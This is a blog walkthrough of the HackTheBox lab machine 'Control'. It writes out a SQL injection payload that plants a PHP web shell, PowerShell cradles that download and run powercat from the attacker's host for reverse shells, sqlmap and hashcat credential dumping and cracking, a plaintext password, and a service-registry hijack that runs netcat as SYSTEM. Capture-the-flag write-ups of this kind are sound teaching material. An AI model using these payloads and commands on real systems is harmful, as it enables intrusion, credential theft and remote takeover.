Control : Hackthebox Walkthrough

Hey fellas!! This is Shreya Pohekar and today we'll be walking through Control from Hackthebox. It was a hard Windows machine. The initial foothold (wwwroot) on the machine exploited a SQL injection, through which I uploaded a web shell. Getting to the user was pretty straightforward, as sqlmap listed the password hashes. Privilege escalation to root required reading through a PowerShell history file, which gave us interesting commands for querying the registry. The user had full control over the registry services, which could therefore be abused to get an administrator shell.

With all that said, let's dive in!!

Start with an nmap scan to find the open ports and services.

# nmap -sC -sV -o control.nmap 10.10.10.167

From the nmap scan, we can conclude that we might get our initial foothold from http.

So let's jump onto the site, http://10.10.10.167, and we get a page

There is a login button, but unfortunately, we can't access it. And it says to set up a proxy!!!!

But which IP to forward the request through??

So after viewing the page source of the launcher page, I found this!!

I got the IP to forward the request to. So set up Burp, add the X-Forwarded-For header, and admin.php loads.

Scrolling through the page, options to create products and categories were implemented, along with a search bar.

I found out that there was a SQL injection in the search bar, so I manually formed queries to find out the database, the user and the number of tables, and got the following result

The database was found to be warehouse and the user was manager.

Alongside manual enumeration, I copied the request to a file, search.req, and started sqlmap.

# sqlmap -r search.req --all --batch

(--batch automatically answers sqlmap's yes/no prompts)

And found a lot of juicy stuff, such as the password for manager and the password hashes for hector and root.

And a few other password hashes

After getting the password for manager, I tried getting a remote shell with evil-winrm and psexec.py, but it didn't work out. So now we need to somehow upload a shell onto the box to get a reverse shell.

I found this blog that totally served the purpose.

But we need to find out where to upload the shell. As the default document root of the IIS web server is C:\inetpub\wwwroot, I tried uploading the shell there.

Since Burp was continuously generating errors, I tweaked the payload I was using. And finally this payload worked

'; select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'C:\\inetpub\\wwwroot\\shell.php';#

The file gets uploaded, but it still generates a general error.

Time to take a reverse shell…

I used powercat.ps1 to obtain the reverse shell.

Just add a line to the end of the file that is going to execute the script.

Now go to the browser and write a command to grab powercat.ps1 from the local machine

10.10.10.167/shells.php?cmd=powershell "iex(New-Object Net.WebClient).downloadString('http://10.10.14.81/powercat.ps1');"

Listen on port 443 for the incoming connection and also set up a Python SimpleHTTPServer.

As the command on the browser executes, we get a shell.

Now grab winpeas.exe using the command:

WinPEAS did not return any interesting results.

But alongside, sqlmap had completed and all the results were dumped to a file inside /root/.sqlmap

I tried to crack the hashes of hector and root that I had previously obtained, using hashcat

Hash-identifier gave the following result

# hashcat --example-hashes | grep -i -B2 mysql

Mode 300 looked similar to what hash-identifier identified

# hashcat --user -m 300 user_hashes /usr/share/wordlists/rockyou.txt --force 

This command can be used if there is more than one password hash; the format is:

user:password_hash

And the password cracked for hector
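As an added illustration (my own code, not from the original post) of what hashcat mode 300 actually computes: MySQL 4.1+ stores SHA1(SHA1(password)) as uppercase hex with a leading "*", and hashcat expects the 40 hex digits without it. The sample line and passwords below are constructed, not the box's real hashes.

```python
import hashlib


def mysql41_hash(password: str) -> str:
    """MySQL 4.1+/5 password hash as hashcat mode 300 expects it: uppercase hex of SHA1(SHA1(pw)).
    MySQL itself shows the same value with a leading '*' (e.g. in mysql.user.authentication_string)."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()  # raw 20-byte digest, not hex
    return hashlib.sha1(inner).hexdigest().upper()


def parse_user_hash_line(line: str) -> tuple[str, str]:
    """Split one 'user:hash' line of the file fed to `hashcat --user -m 300`.
    A leading '*' copied from MySQL and lowercase hex are tolerated and normalised."""
    user, _, digest = line.strip().partition(":")
    digest = digest.lstrip("*").upper()
    if len(digest) != 40 or any(c not in "0123456789ABCDEF" for c in digest):
        raise ValueError(f"{user}: value is not a MySQL4.1/5 hash")
    return user, digest


def verify_candidate(line: str, candidate: str) -> bool:
    """True when the candidate password reproduces the stored hash on that line."""
    _, digest = parse_user_hash_line(line)
    return mysql41_hash(candidate) == digest


# Constructed sample in the user:hash format the post describes (made-up passwords, not the box's).
SAMPLE_LINES = [
    "hector:" + mysql41_hash("example-only"),
    "root:*" + mysql41_hash("another-example").lower(),
]
```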

Now, back to our Windows machine, we again take a reverse shell, this time with the creds of hector. We create a PSCredential object, which takes the username in plain text and the password in encrypted (SecureString) form. This method is useful for automating logins. You can read about PSCredential here.

# $pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force

# $cred = New-Object System.Management.Automation.PSCredential('.\hector', $pass)

# $cred

The hostname of the machine is Fidelity. Check it with # hostname

Now set up a Python web server and spawn an nc listener on the specified port. The command below gives the reverse shell, but now as hector.

# invoke-command -Computer Fidelity -Credential $cred -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.14.81/powercat.ps1') }

Now we can grab our user.txt…

NOTE: rlwrap nc -lnvp can be used when catching a shell from a Windows machine to get the arrow keys working

So now time to root!

Again I ran winPEAS.exe but didn't find any interesting results. Then I found this file: PSReadline.

This is a PowerShell history file (similar to bash_history on Linux). On listing its contents, I found 2 commands relating to the registry.

> get-childitem HKLM:\SYSTEM\CurrentControlset | format-list

The command lists the keys under CurrentControlSet in the registry (Control, Enum, Services and so on).

get-childitem HKLM:\SYSTEM\CurrentControlset | format-list


Property  	: {BootDriverFlags, CurrentUser, EarlyStartServices, PreshutdownOrder...}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Control
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 121
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 11
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control

Property  	: {NextParentID.daba3ff.2, NextParentID.61aaa01.3, NextParentID.1bd7f811.4, NextParentID.2032e665.5...}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Enum
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 17
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 27
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum

Property  	: {}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Hardware Profiles
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 3
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 0
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles

Property  	: {}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Policies
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 0
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 0
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies

Property  	: {}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Services
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 667
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 0
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services

Property  	: {}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Software
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 1
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 0
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software

The Get-Acl cmdlet gets you the security descriptor of a resource, such as a file or registry key. The Sddl field contains the access control entries of the resource in SDDL form.

get-acl HKLM:\SYSTEM\CurrentControlSet | format-list


Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
Owner  : BUILTIN\Administrators
Group  : NT AUTHORITY\SYSTEM
Access : BUILTIN\Administrators Allow  FullControl
     	NT AUTHORITY\Authenticated Users Allow  ReadKey
     	NT AUTHORITY\Authenticated Users Allow  -2147483648
     	S-1-5-32-549 Allow  ReadKey
     	S-1-5-32-549 Allow  -2147483648
     	BUILTIN\Administrators Allow  FullControl
     	BUILTIN\Administrators Allow  268435456
     	NT AUTHORITY\SYSTEM Allow  FullControl
     	NT AUTHORITY\SYSTEM Allow  268435456
     	CREATOR OWNER Allow  268435456
     	APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
     	APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -2147483648
     	S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  
     	ReadKey
     	S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  
     	-2147483648
Audit  :
Sddl   : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOID;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)

Based on the above 2 results, I found out that hector has full control over the registry.

As a note, these commands list SDDLs. Security Descriptor Definition Language (SDDL) is a formal way to specify Microsoft Windows security descriptors: text strings that describe who owns various objects, such as files, in the system. The security descriptor may also provide an ACL for an object or its group.

# $acl = get-acl HKLM:\System\CurrentControlSet\Services

# ConvertFrom-SddlString -Sddl $acl.Sddl -Type RegistryRights | Foreach-Object {$_.DiscretionaryAcl}

So that's a much more readable form of hector having full control over the registry's Services key.

# cd HKLM:

# cd SYSTEM\CurrentControlSet\Services

We need to find all the services running as LocalSystem, so that we can modify one of them and get a reverse shell as NT AUTHORITY\SYSTEM.

The service (running as LocalSystem) should have its startup type set to manual, and we should also have permission to start and stop the service.

Start : 3 (signifies manual start)

ImagePath (this is where the service loads its executable from, so this is where we point our shell)

ObjectName : LocalSystem (the advantage of running under the LocalSystem account is that the service has complete, unrestricted access to local resources)

Now I'll filter the services on the three parameters described above.

# cd SYSTEM\CurrentControlSet\Services

# $services = Get-ItemProperty -Path *

# $temp = $services | where { ($_.ObjectName -match 'LocalSystem') }

# $temp | select PSChildName | measure

# $temp = $services | where { ($_.ObjectName -match 'LocalSystem') -and ($_.Start -match '3') }

# $temp | select PSChildName | measure

So after filtering, I found that wuauserv (Windows Update service) is one such service that matches the criteria. So let's exploit!!

# sc.exe sdshow wuauserv

The image below shows the SDDL set on the wuauserv service, which makes it exploitable.

# ConvertFrom-SddlString -Sddl "D:(A;;CCLCSWRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)" | Foreach-Object {$_.DiscretionaryAcl}

A more readable format representing the SDDL of the wuauserv service
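As an added example (my own code, not from the post), here is a small decoder for the two SDDL strings quoted above, the one Get-Acl returned for HKLM:\SYSTEM\CurrentControlSet and the one sc.exe sdshow returned for wuauserv. It expands the two-letter rights codes, which decode differently on a registry key and on a service, and reports who may start the service versus who may reconfigure it; that contrast is what an auditor looks for, since a start right only becomes a problem when the service's registry key is writable. The SID aliases and right names are the standard ones; the strings are taken verbatim from the page.

```python
import re

# Two-letter SID aliases that occur in the SDDL strings quoted on this page.
SID_ALIASES = {"AU": "Authenticated Users", "BA": "Administrators", "SY": "Local System",
               "SO": "Server Operators", "CO": "Creator Owner", "AC": "All Application Packages"}
# Generic and standard rights mean the same thing on every object type.
COMMON_RIGHTS = {"GA": "GenericAll", "GR": "GenericRead", "GW": "GenericWrite", "GX": "GenericExecute",
                 "SD": "Delete", "RC": "ReadControl", "WD": "WriteDac", "WO": "WriteOwner"}
# Object-specific codes: the same letters decode differently on a registry key and on a service.
REGISTRY_RIGHTS = {"KA": "KeyAllAccess", "KR": "KeyRead", "KW": "KeyWrite", "KX": "KeyExecute"}
SERVICE_RIGHTS = {"CC": "QueryConfig", "DC": "ChangeConfig", "LC": "QueryStatus", "SW": "EnumerateDependents",
                  "RP": "Start", "WP": "Stop", "DT": "PauseContinue", "LO": "Interrogate", "CR": "UserDefinedControl"}
ACE_FLAGS = {"CI": "ContainerInherit", "OI": "ObjectInherit", "IO": "InheritOnly", "ID": "Inherited", "NP": "NoPropagate"}

def _codes(field, table):
    """Expand a run of two-letter codes such as 'CCLCSWRP'; a hex mask ('0x...') is kept verbatim."""
    if field.startswith("0x"):
        return [field]
    return [table.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)]

def parse_dacl(sddl, kind):
    """Decode the D: part of an SDDL string into ACE dicts; kind is 'registry' or 'service'."""
    table = dict(COMMON_RIGHTS, **(REGISTRY_RIGHTS if kind == "registry" else SERVICE_RIGHTS))
    aces_text = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl).group(1)  # skip DACL flags like AI/P
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", aces_text):
        ace_type, flags, rights, _obj_guid, _inherit_guid, sid = ace.split(";")
        aces.append({"allow": ace_type == "A", "flags": _codes(flags, ACE_FLAGS),
                     "rights": _codes(rights, table), "principal": SID_ALIASES.get(sid, sid)})
    return aces

def principals_with(sddl, kind, right):
    """Principals with an allow ACE naming the right explicitly (duplicates removed, order kept)."""
    return list(dict.fromkeys(a["principal"] for a in parse_dacl(sddl, kind)
                              if a["allow"] and right in a["rights"]))

def start_without_reconfigure(service_sddl):
    """Principals that may start a service but not change its configuration: the service ACL is
    sound on its own, and only a writable registry key (as on this box) turns Start into code execution."""
    reconfig = {"ChangeConfig", "GenericAll", "WriteDac", "WriteOwner"}
    return [a["principal"] for a in parse_dacl(service_sddl, "service")
            if a["allow"] and "Start" in a["rights"] and not reconfig & set(a["rights"])]

# The two SDDL strings quoted on this page (registry key HKLM:\SYSTEM\CurrentControlSet and wuauserv).
BIG_SID = "S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681"
CURRENTCONTROLSET_SDDL = ("O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)"
                          "(A;ID;KA;;;BA)(A;CIIOID;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)"
                          f"(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;{BIG_SID})(A;CIIOID;GR;;;{BIG_SID})")
WUAUSERV_SDDL = "D:(A;;CCLCSWRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)"
```

Running `principals_with(WUAUSERV_SDDL, "service", "Stop")` shows only Administrators and Local System, which is why the post notes that hector could not have stopped the service had it been running.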

After querying the service, we find that it is stopped. That's what we wanted, because hector doesn't have permission to stop a running service.

Grab nc64.exe from the local machine and save it as C:\Windows\System32\spool\drivers\color\nc64.exe

Using:

wget http://10.10.14.81/nc64.exe -OutFile nc64.exe

> set-itemProperty -path wuauserv -Name ImagePath -Value "C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.81 9001 -e powershell"
> get-item wuauserv  (to check that our shell binary was properly set as the ImagePath)
# sc.exe start wuauserv

When we start the service, the binary in the ImagePath gets loaded and executed. In our case, nc64.exe gets executed and connects to the listener that was spawned on the local machine using:

# nc -lnvp 9001

Yes it was a long way to go but the reward is worth it!!

That’s all for the blog post. Thanks for reading!!

Until then, Happy Hacking!!

For more such content subscribe to my page.

shreyapohekar

I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as iOS and angular developer. I am also a contributor to CodeVigilant project. My blogs are focused on Infosec and Dev and its how to's.